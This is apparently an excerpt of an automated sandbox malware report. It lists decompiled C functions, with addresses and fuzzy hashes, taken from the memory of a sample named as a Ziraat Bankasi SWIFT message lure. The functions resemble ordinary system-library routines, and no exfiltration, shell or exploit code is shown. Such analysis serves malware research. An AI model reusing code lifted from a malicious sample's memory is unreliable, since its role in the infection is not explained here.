                                                                    						_push(_v60);
                                                                    						_t108 = E018D9990();
                                                                    						if(_t108 < 0) {
                                                                    							L10:
                                                                    							_push(_v60);
                                                                    							E018D95D0();
                                                                    							goto L11;
                                                                    						} else {
                                                                    							_t109 = L018B4620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
                                                                    							if(_t109 == 0) {
                                                                    								_t108 = 0xc0000017;
                                                                    								goto L10;
                                                                    							} else {
                                                                    								_t21 = _t109 + 0x18; // 0x18
                                                                    								 *((intOrPtr*)(_t109 + 4)) = _v60;
                                                                    								 *_t109 = 1;
                                                                    								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
                                                                    								 *(_t109 + 0xe) = _t82;
                                                                    								 *((intOrPtr*)(_t109 + 8)) = _v56;
                                                                    								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
                                                                    								E018DF3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
                                                                    								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                                                                    								 *((short*)(_t109 + 0xc)) =  *_t103;
                                                                    								_t91 =  *_t103 & 0x0000ffff;
                                                                    								_t100 = _t91 & 0xfffffffe;
                                                                    								_t84 = 0x5c;
                                                                    								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
                                                                    									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
                                                                    										_push(_v60);
                                                                    										E018D95D0();
                                                                    										L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
                                                                    										_t51 = 0xc0000106;
                                                                    									} else {
                                                                    										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
                                                                    										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                                                                    										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
                                                                    										goto L5;
                                                                    									}
                                                                    								} else {
                                                                    									L5:
                                                                    									 *_a4 = _t109;
                                                                    									_t51 = 0;
                                                                    								}
                                                                    							}
                                                                    						}
                                                                    					}
                                                                    				}
                                                                    				return _t51;
                                                                    			}

























                                                                    0x018cf0d3
                                                                    0x018cf0d9
                                                                    0x018cf0e0
                                                                    0x018cf0e7
                                                                    0x018cf0f2
                                                                    0x018cf0f4
                                                                    0x018cf0f8
                                                                    0x018cf100
                                                                    0x018cf108
                                                                    0x018cf10d
                                                                    0x018cf115
                                                                    0x018cf116
                                                                    0x018cf11f
                                                                    0x018cf123
                                                                    0x018cf124
                                                                    0x018cf12c
                                                                    0x018cf130
                                                                    0x018cf134
                                                                    0x018cf13d
                                                                    0x018cf144
                                                                    0x018cf14b
                                                                    0x018cf152
                                                                    0x0190bab0
                                                                    0x0190bab0
                                                                    0x018cf158
                                                                    0x018cf158
                                                                    0x018cf15a
                                                                    0x018cf160
                                                                    0x018cf165
                                                                    0x018cf166
                                                                    0x018cf16f
                                                                    0x018cf173
                                                                    0x0190baa7
                                                                    0x0190baa7
                                                                    0x0190baab
                                                                    0x00000000
                                                                    0x018cf179
                                                                    0x018cf18d
                                                                    0x018cf191
                                                                    0x0190baa2
                                                                    0x00000000
                                                                    0x018cf197
                                                                    0x018cf19b
                                                                    0x018cf1a2
                                                                    0x018cf1a9
                                                                    0x018cf1af
                                                                    0x018cf1b2
                                                                    0x018cf1b6
                                                                    0x018cf1b9
                                                                    0x018cf1c4
                                                                    0x018cf1d8
                                                                    0x018cf1df
                                                                    0x018cf1e3
                                                                    0x018cf1eb
                                                                    0x018cf1ee
                                                                    0x018cf1f4
                                                                    0x018cf20f
                                                                    0x0190bab7
                                                                    0x0190babb
                                                                    0x0190bacc
                                                                    0x0190bad1
                                                                    0x018cf215
                                                                    0x018cf218
                                                                    0x018cf226
                                                                    0x018cf22b
                                                                    0x00000000
                                                                    0x018cf22b
                                                                    0x018cf1f6
                                                                    0x018cf1f6
                                                                    0x018cf1f9
                                                                    0x018cf1fb
                                                                    0x018cf1fb
                                                                    0x018cf1f4
                                                                    0x018cf191
                                                                    0x018cf173
                                                                    0x018cf152
                                                                    0x018cf203

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @
                                                                    • API String ID: 0-2766056989
                                                                    • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                    • Instruction ID: 5aa882849b252696784207e0e6f3c5e54acb1e63a6930c5ea86d123a1466bfe6
                                                                    • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                    • Instruction Fuzzy Hash: 66517B715007159FD321DF18C840A6BBBF9BF88710F00492EFA96C7690E774E944CB92
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 75%
                                                                    			E01913540(intOrPtr _a4) {
                                                                    				signed int _v12;
                                                                    				intOrPtr _v88;
                                                                    				intOrPtr _v92;
                                                                    				char _v96;
                                                                    				char _v352;
                                                                    				char _v1072;
                                                                    				intOrPtr _v1140;
                                                                    				intOrPtr _v1148;
                                                                    				char _v1152;
                                                                    				char _v1156;
                                                                    				char _v1160;
                                                                    				char _v1164;
                                                                    				char _v1168;
                                                                    				char* _v1172;
                                                                    				short _v1174;
                                                                    				char _v1176;
                                                                    				char _v1180;
                                                                    				char _v1192;
                                                                    				void* __ebx;
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				void* __ebp;
                                                                    				short _t41;
                                                                    				short _t42;
                                                                    				intOrPtr _t80;
                                                                    				intOrPtr _t81;
                                                                    				signed int _t82;
                                                                    				void* _t83;
                                                                    
                                                                    				_v12 =  *0x198d360 ^ _t82;
                                                                    				_t41 = 0x14;
                                                                    				_v1176 = _t41;
                                                                    				_t42 = 0x16;
                                                                    				_v1174 = _t42;
                                                                    				_v1164 = 0x100;
                                                                    				_v1172 = L"BinaryHash";
                                                                    				_t81 = E018D0BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
                                                                    				if(_t81 < 0) {
                                                                    					L11:
                                                                    					_t75 = _t81;
                                                                    					E01913706(0, _t81, _t79, _t80);
                                                                    					L12:
                                                                    					if(_a4 != 0xc000047f) {
                                                                    						E018DFA60( &_v1152, 0, 0x50);
                                                                    						_v1152 = 0x60c201e;
                                                                    						_v1148 = 1;
                                                                    						_v1140 = E01913540;
                                                                    						E018DFA60( &_v1072, 0, 0x2cc);
                                                                    						_push( &_v1072);
                                                                    						E018EDDD0( &_v1072, _t75, _t79, _t80, _t81);
                                                                    						E01920C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
                                                                    						_push(_v1152);
                                                                    						_push(0xffffffff);
                                                                    						E018D97C0();
                                                                    					}
                                                                    					return E018DB640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
                                                                    				}
                                                                    				_t79 =  &_v352;
                                                                    				_t81 = E01913971(0, _a4,  &_v352,  &_v1156);
                                                                    				if(_t81 < 0) {
                                                                    					goto L11;
                                                                    				}
                                                                    				_t75 = _v1156;
                                                                    				_t79 =  &_v1160;
                                                                    				_t81 = E01913884(_v1156,  &_v1160,  &_v1168);
                                                                    				if(_t81 >= 0) {
                                                                    					_t80 = _v1160;
                                                                    					E018DFA60( &_v96, 0, 0x50);
                                                                    					_t83 = _t83 + 0xc;
                                                                    					_push( &_v1180);
                                                                    					_push(0x50);
                                                                    					_push( &_v96);
                                                                    					_push(2);
                                                                    					_push( &_v1176);
                                                                    					_push(_v1156);
                                                                    					_t81 = E018D9650();
                                                                    					if(_t81 >= 0) {
                                                                    						if(_v92 != 3 || _v88 == 0) {
                                                                    							_t81 = 0xc000090b;
                                                                    						}
                                                                    						if(_t81 >= 0) {
                                                                    							_t75 = _a4;
                                                                    							_t79 =  &_v352;
                                                                    							E01913787(_a4,  &_v352, _t80);
                                                                    						}
                                                                    					}
                                                                    					L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
                                                                    				}
                                                                    				_push(_v1156);
                                                                    				E018D95D0();
                                                                    				if(_t81 >= 0) {
                                                                    					goto L12;
                                                                    				} else {
                                                                    					goto L11;
                                                                    				}
                                                                    			}































                                                                    0x01913552
                                                                    0x0191355a
                                                                    0x0191355d
                                                                    0x01913566
                                                                    0x01913567
                                                                    0x0191357e
                                                                    0x0191358f
                                                                    0x019135a1
                                                                    0x019135a5
                                                                    0x0191366b
                                                                    0x0191366b
                                                                    0x0191366d
                                                                    0x01913672
                                                                    0x01913679
                                                                    0x01913685
                                                                    0x0191368d
                                                                    0x0191369d
                                                                    0x019136a7
                                                                    0x019136b8
                                                                    0x019136c6
                                                                    0x019136c7
                                                                    0x019136dc
                                                                    0x019136e1
                                                                    0x019136e7
                                                                    0x019136e9
                                                                    0x019136e9
                                                                    0x01913703
                                                                    0x01913703
                                                                    0x019135b5
                                                                    0x019135c0
                                                                    0x019135c4
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x019135ca
                                                                    0x019135d7
                                                                    0x019135e2
                                                                    0x019135e6
                                                                    0x019135e8
                                                                    0x019135f5
                                                                    0x019135fa
                                                                    0x01913603
                                                                    0x01913604
                                                                    0x01913609
                                                                    0x0191360a
                                                                    0x01913612
                                                                    0x01913613
                                                                    0x0191361e
                                                                    0x01913622
                                                                    0x01913628
                                                                    0x0191362f
                                                                    0x0191362f
                                                                    0x01913636
                                                                    0x01913638
                                                                    0x0191363b
                                                                    0x01913642
                                                                    0x01913642
                                                                    0x01913636
                                                                    0x01913657
                                                                    0x01913657
                                                                    0x0191365c
                                                                    0x01913662
                                                                    0x01913669
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: BinaryHash
                                                                    • API String ID: 0-2202222882
                                                                    • Opcode ID: 81aea42c6b4a58548f2176ea7dc0aa0aaa43932d66ce83c4fed2e6f1e7713eb8
                                                                    • Instruction ID: aa6f18ccc8101631416b7888732731e531c8ac971850e3267508d2e71950ad28
                                                                    • Opcode Fuzzy Hash: 81aea42c6b4a58548f2176ea7dc0aa0aaa43932d66ce83c4fed2e6f1e7713eb8
                                                                    • Instruction Fuzzy Hash: 4C4133B1D0062D9BDB21DA54CC85F9EB77CAB44768F0045A5EA0DAB240DB309F888F95
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 71%
                                                                    			E019605AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
                                                                    				signed int _v20;
                                                                    				char _v24;
                                                                    				signed int _v28;
                                                                    				char _v32;
                                                                    				signed int _v36;
                                                                    				intOrPtr _v40;
                                                                    				void* __ebx;
                                                                    				void* _t35;
                                                                    				signed int _t42;
                                                                    				char* _t48;
                                                                    				signed int _t59;
                                                                    				signed char _t61;
                                                                    				signed int* _t79;
                                                                    				void* _t88;
                                                                    
                                                                    				_v28 = __edx;
                                                                    				_t79 = __ecx;
                                                                    				if(E019607DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
                                                                    					L13:
                                                                    					_t35 = 0;
                                                                    					L14:
                                                                    					return _t35;
                                                                    				}
                                                                    				_t61 = __ecx[1];
                                                                    				_t59 = __ecx[0xf];
                                                                    				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
                                                                    				_v36 = _a8 << 0xc;
                                                                    				_t42 =  *(_t59 + 0xc) & 0x40000000;
                                                                    				asm("sbb esi, esi");
                                                                    				_t88 = ( ~_t42 & 0x0000003c) + 4;
                                                                    				if(_t42 != 0) {
                                                                    					_push(0);
                                                                    					_push(0x14);
                                                                    					_push( &_v24);
                                                                    					_push(3);
                                                                    					_push(_t59);
                                                                    					_push(0xffffffff);
                                                                    					if(E018D9730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
                                                                    						_push(_t61);
                                                                    						E0195A80D(_t59, 1, _v20, 0);
                                                                    						_t88 = 4;
                                                                    					}
                                                                    				}
                                                                    				_t35 = E0195A854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
                                                                    				if(_t35 < 0) {
                                                                    					goto L14;
                                                                    				}
                                                                    				E01961293(_t79, _v40, E019607DF(_t79, _v28,  &_a4,  &_a8, 1));
                                                                    				if(E018B7D50() == 0) {
                                                                    					_t48 = 0x7ffe0380;
                                                                    				} else {
                                                                    					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                    				}
                                                                    				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                                                    					E0195138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
                                                                    				}
                                                                    				goto L13;
                                                                    			}

















                                                                    0x019605c5
                                                                    0x019605ca
                                                                    0x019605d3
                                                                    0x019606db
                                                                    0x019606db
                                                                    0x019606dd
                                                                    0x019606e3
                                                                    0x019606e3
                                                                    0x019605dd
                                                                    0x019605e7
                                                                    0x019605f6
                                                                    0x01960600
                                                                    0x01960607
                                                                    0x01960610
                                                                    0x01960615
                                                                    0x0196061a
                                                                    0x0196061c
                                                                    0x0196061e
                                                                    0x01960624
                                                                    0x01960625
                                                                    0x01960627
                                                                    0x01960628
                                                                    0x01960631
                                                                    0x01960640
                                                                    0x0196064d
                                                                    0x01960654
                                                                    0x01960654
                                                                    0x01960631
                                                                    0x0196066d
                                                                    0x01960674
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x01960692
                                                                    0x0196069e
                                                                    0x019606b0
                                                                    0x019606a0
                                                                    0x019606a9
                                                                    0x019606a9
                                                                    0x019606b8
                                                                    0x019606d6
                                                                    0x019606d6
                                                                    0x00000000

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: `
                                                                    • API String ID: 0-2679148245
                                                                    • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                                    • Instruction ID: 9c94b693a90e43bc64b9675ed46cc147436aa2d1349d3b54eb993dd44d087442
                                                                    • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                                    • Instruction Fuzzy Hash: 0731C0326043466BE720DE29CD85F9A7B9DBBC4754F184229FA58AB2C0D770ED14CBA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 72%
                                                                    			E01913884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
                                                                    				char _v8;
                                                                    				intOrPtr _v12;
                                                                    				intOrPtr* _v16;
                                                                    				char* _v20;
                                                                    				short _v22;
                                                                    				char _v24;
                                                                    				intOrPtr _t38;
                                                                    				short _t40;
                                                                    				short _t41;
                                                                    				void* _t44;
                                                                    				intOrPtr _t47;
                                                                    				void* _t48;
                                                                    
                                                                    				_v16 = __edx;
                                                                    				_t40 = 0x14;
                                                                    				_v24 = _t40;
                                                                    				_t41 = 0x16;
                                                                    				_v22 = _t41;
                                                                    				_t38 = 0;
                                                                    				_v12 = __ecx;
                                                                    				_push( &_v8);
                                                                    				_push(0);
                                                                    				_push(0);
                                                                    				_push(2);
                                                                    				_t43 =  &_v24;
                                                                    				_v20 = L"BinaryName";
                                                                    				_push( &_v24);
                                                                    				_push(__ecx);
                                                                    				_t47 = 0;
                                                                    				_t48 = E018D9650();
                                                                    				if(_t48 >= 0) {
                                                                    					_t48 = 0xc000090b;
                                                                    				}
                                                                    				if(_t48 != 0xc0000023) {
                                                                    					_t44 = 0;
                                                                    					L13:
                                                                    					if(_t48 < 0) {
                                                                    						L16:
                                                                    						if(_t47 != 0) {
                                                                    							L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
                                                                    						}
                                                                    						L18:
                                                                    						return _t48;
                                                                    					}
                                                                    					 *_v16 = _t38;
                                                                    					 *_a4 = _t47;
                                                                    					goto L18;
                                                                    				}
                                                                    				_t47 = L018B4620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
                                                                    				if(_t47 != 0) {
                                                                    					_push( &_v8);
                                                                    					_push(_v8);
                                                                    					_push(_t47);
                                                                    					_push(2);
                                                                    					_push( &_v24);
                                                                    					_push(_v12);
                                                                    					_t48 = E018D9650();
                                                                    					if(_t48 < 0) {
                                                                    						_t44 = 0;
                                                                    						goto L16;
                                                                    					}
                                                                    					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
                                                                    						_t48 = 0xc000090b;
                                                                    					}
                                                                    					_t44 = 0;
                                                                    					if(_t48 < 0) {
                                                                    						goto L16;
                                                                    					} else {
                                                                    						_t17 = _t47 + 0xc; // 0xc
                                                                    						_t38 = _t17;
                                                                    						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
                                                                    							_t48 = 0xc000090b;
                                                                    						}
                                                                    						goto L13;
                                                                    					}
                                                                    				}
                                                                    				_t48 = _t48 + 0xfffffff4;
                                                                    				goto L18;
                                                                    			}















                                                                    0x01913893
                                                                    0x01913896
                                                                    0x01913899
                                                                    0x0191389f
                                                                    0x019138a0
                                                                    0x019138a4
                                                                    0x019138a9
                                                                    0x019138ac
                                                                    0x019138ad
                                                                    0x019138ae
                                                                    0x019138af
                                                                    0x019138b1
                                                                    0x019138b4
                                                                    0x019138bb
                                                                    0x019138bc
                                                                    0x019138bd
                                                                    0x019138c4
                                                                    0x019138c8
                                                                    0x019138ca
                                                                    0x019138ca
                                                                    0x019138d5
                                                                    0x0191393e
                                                                    0x01913940
                                                                    0x01913942
                                                                    0x01913952
                                                                    0x01913954
                                                                    0x01913961
                                                                    0x01913961
                                                                    0x01913967
                                                                    0x0191396e
                                                                    0x0191396e
                                                                    0x01913947
                                                                    0x0191394c
                                                                    0x00000000
                                                                    0x0191394c
                                                                    0x019138ea
                                                                    0x019138ee
                                                                    0x019138f8
                                                                    0x019138f9
                                                                    0x019138ff
                                                                    0x01913900
                                                                    0x01913902
                                                                    0x01913903
                                                                    0x0191390b
                                                                    0x0191390f
                                                                    0x01913950
                                                                    0x00000000
                                                                    0x01913950
                                                                    0x01913915
                                                                    0x0191391d
                                                                    0x0191391d
                                                                    0x01913922
                                                                    0x01913926
                                                                    0x00000000
                                                                    0x01913928
                                                                    0x0191392b
                                                                    0x0191392b
                                                                    0x01913935
                                                                    0x01913937
                                                                    0x01913937
                                                                    0x00000000
                                                                    0x01913935
                                                                    0x01913926
                                                                    0x019138f0
                                                                    0x00000000

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: BinaryName
                                                                    • API String ID: 0-215506332
                                                                    • Opcode ID: fcb7f2b9d5a06e3eaf436c456e174efd45faf57d07424f37126ac934e4eb3a9c
                                                                    • Instruction ID: 8356551936df8b447f58e8eb8c4deb9af734fcf30d4d005b14836572e6faf5bb
                                                                    • Opcode Fuzzy Hash: fcb7f2b9d5a06e3eaf436c456e174efd45faf57d07424f37126ac934e4eb3a9c
                                                                    • Instruction Fuzzy Hash: 8431F472D0060EEFEB16DA5CC945D6BBB79FB80730F014169E919A7244D7309F40C7A1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 33%
                                                                    			E018CD294(void* __ecx, char __edx, void* __eflags) {
                                                                    				signed int _v8;
                                                                    				char _v52;
                                                                    				signed int _v56;
                                                                    				signed int _v60;
                                                                    				intOrPtr _v64;
                                                                    				char* _v68;
                                                                    				intOrPtr _v72;
                                                                    				char _v76;
                                                                    				signed int _v84;
                                                                    				intOrPtr _v88;
                                                                    				char _v92;
                                                                    				intOrPtr _v96;
                                                                    				intOrPtr _v100;
                                                                    				char _v104;
                                                                    				char _v105;
                                                                    				void* __ebx;
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				signed int _t35;
                                                                    				char _t38;
                                                                    				signed int _t40;
                                                                    				signed int _t44;
                                                                    				signed int _t52;
                                                                    				void* _t53;
                                                                    				void* _t55;
                                                                    				void* _t61;
                                                                    				intOrPtr _t62;
                                                                    				void* _t64;
                                                                    				signed int _t65;
                                                                    				signed int _t66;
                                                                    
                                                                    				_t68 = (_t66 & 0xfffffff8) - 0x6c;
                                                                    				_v8 =  *0x198d360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
                                                                    				_v105 = __edx;
                                                                    				_push( &_v92);
                                                                    				_t52 = 0;
                                                                    				_push(0);
                                                                    				_push(0);
                                                                    				_push( &_v104);
                                                                    				_push(0);
                                                                    				_t59 = __ecx;
                                                                    				_t55 = 2;
                                                                    				if(E018B4120(_t55, __ecx) < 0) {
                                                                    					_t35 = 0;
                                                                    					L8:
                                                                    					_pop(_t61);
                                                                    					_pop(_t64);
                                                                    					_pop(_t53);
                                                                    					return E018DB640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
                                                                    				}
                                                                    				_v96 = _v100;
                                                                    				_t38 = _v92;
                                                                    				if(_t38 != 0) {
                                                                    					_v104 = _t38;
                                                                    					_v100 = _v88;
                                                                    					_t40 = _v84;
                                                                    				} else {
                                                                    					_t40 = 0;
                                                                    				}
                                                                    				_v72 = _t40;
                                                                    				_v68 =  &_v104;
                                                                    				_push( &_v52);
                                                                    				_v76 = 0x18;
                                                                    				_push( &_v76);
                                                                    				_v64 = 0x40;
                                                                    				_v60 = _t52;
                                                                    				_v56 = _t52;
                                                                    				_t44 = E018D98D0();
                                                                    				_t62 = _v88;
                                                                    				_t65 = _t44;
                                                                    				if(_t62 != 0) {
                                                                    					asm("lock xadd [edi], eax");
                                                                    					if((_t44 | 0xffffffff) != 0) {
                                                                    						goto L4;
                                                                    					}
                                                                    					_push( *((intOrPtr*)(_t62 + 4)));
                                                                    					E018D95D0();
                                                                    					L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
                                                                    					goto L4;
                                                                    				} else {
                                                                    					L4:
                                                                    					L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
                                                                    					if(_t65 >= 0) {
                                                                    						_t52 = 1;
                                                                    					} else {
                                                                    						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
                                                                    							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
                                                                    						}
                                                                    					}
                                                                    					_t35 = _t52;
                                                                    					goto L8;
                                                                    				}
                                                                    			}

































                                                                    0x018cd29c
                                                                    0x018cd2a6
                                                                    0x018cd2b1
                                                                    0x018cd2b5
                                                                    0x018cd2b6
                                                                    0x018cd2bc
                                                                    0x018cd2bd
                                                                    0x018cd2be
                                                                    0x018cd2bf
                                                                    0x018cd2c2
                                                                    0x018cd2c4
                                                                    0x018cd2cc
                                                                    0x018cd384
                                                                    0x018cd34b
                                                                    0x018cd34f
                                                                    0x018cd350
                                                                    0x018cd351
                                                                    0x018cd35c
                                                                    0x018cd35c
                                                                    0x018cd2d6
                                                                    0x018cd2da
                                                                    0x018cd2e1
                                                                    0x018cd361
                                                                    0x018cd369
                                                                    0x018cd36d
                                                                    0x018cd2e3
                                                                    0x018cd2e3
                                                                    0x018cd2e3
                                                                    0x018cd2e5
                                                                    0x018cd2ed
                                                                    0x018cd2f5
                                                                    0x018cd2fa
                                                                    0x018cd302
                                                                    0x018cd303
                                                                    0x018cd30b
                                                                    0x018cd30f
                                                                    0x018cd313
                                                                    0x018cd318
                                                                    0x018cd31c
                                                                    0x018cd320
                                                                    0x018cd379
                                                                    0x018cd37d
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0190affe
                                                                    0x0190b001
                                                                    0x0190b011
                                                                    0x00000000
                                                                    0x018cd322
                                                                    0x018cd322
                                                                    0x018cd330
                                                                    0x018cd337
                                                                    0x018cd35d
                                                                    0x018cd339
                                                                    0x018cd33f
                                                                    0x018cd38c
                                                                    0x018cd38c
                                                                    0x018cd33f
                                                                    0x018cd349
                                                                    0x00000000
                                                                    0x018cd349

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @
                                                                    • API String ID: 0-2766056989
                                                                    • Opcode ID: 53ce8b0564b485c13b6e87bbece3317daafb414ea3b66a3ba7717a35bb26d95d
                                                                    • Instruction ID: eef6c4e756287343409da42fcf3f65814b504c60b7bd9eb39ff1636c21a4d0ce
                                                                    • Opcode Fuzzy Hash: 53ce8b0564b485c13b6e87bbece3317daafb414ea3b66a3ba7717a35bb26d95d
                                                                    • Instruction Fuzzy Hash: 84317EB15083459FC311EF68C9809ABBBE8EB95B58F000A2EF995C3251E634DE04CBD3
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 72%
                                                                    			E018A1B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
                                                                    				intOrPtr _v8;
                                                                    				char _v16;
                                                                    				intOrPtr* _t26;
                                                                    				intOrPtr _t29;
                                                                    				void* _t30;
                                                                    				signed int _t31;
                                                                    
                                                                    				_t27 = __ecx;
                                                                    				_t29 = __edx;
                                                                    				_t31 = 0;
                                                                    				_v8 = __edx;
                                                                    				if(__edx == 0) {
                                                                    					L18:
                                                                    					_t30 = 0xc000000d;
                                                                    					goto L12;
                                                                    				} else {
                                                                    					_t26 = _a4;
                                                                    					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
                                                                    						goto L18;
                                                                    					} else {
                                                                    						E018DBB40(__ecx,  &_v16, __ecx);
                                                                    						_push(_t26);
                                                                    						_push(0);
                                                                    						_push(0);
                                                                    						_push(_t29);
                                                                    						_push( &_v16);
                                                                    						_t30 = E018DA9B0();
                                                                    						if(_t30 >= 0) {
                                                                    							_t19 =  *_t26;
                                                                    							if( *_t26 != 0) {
                                                                    								goto L7;
                                                                    							} else {
                                                                    								 *_a8 =  *_a8 & 0;
                                                                    							}
                                                                    						} else {
                                                                    							if(_t30 != 0xc0000023) {
                                                                    								L9:
                                                                    								_push(_t26);
                                                                    								_push( *_t26);
                                                                    								_push(_t31);
                                                                    								_push(_v8);
                                                                    								_push( &_v16);
                                                                    								_t30 = E018DA9B0();
                                                                    								if(_t30 < 0) {
                                                                    									L12:
                                                                    									if(_t31 != 0) {
                                                                    										L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
                                                                    									}
                                                                    								} else {
                                                                    									 *_a8 = _t31;
                                                                    								}
                                                                    							} else {
                                                                    								_t19 =  *_t26;
                                                                    								if( *_t26 == 0) {
                                                                    									_t31 = 0;
                                                                    								} else {
                                                                    									L7:
                                                                    									_t31 = L018B4620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
                                                                    								}
                                                                    								if(_t31 == 0) {
                                                                    									_t30 = 0xc0000017;
                                                                    								} else {
                                                                    									goto L9;
                                                                    								}
                                                                    							}
                                                                    						}
                                                                    					}
                                                                    				}
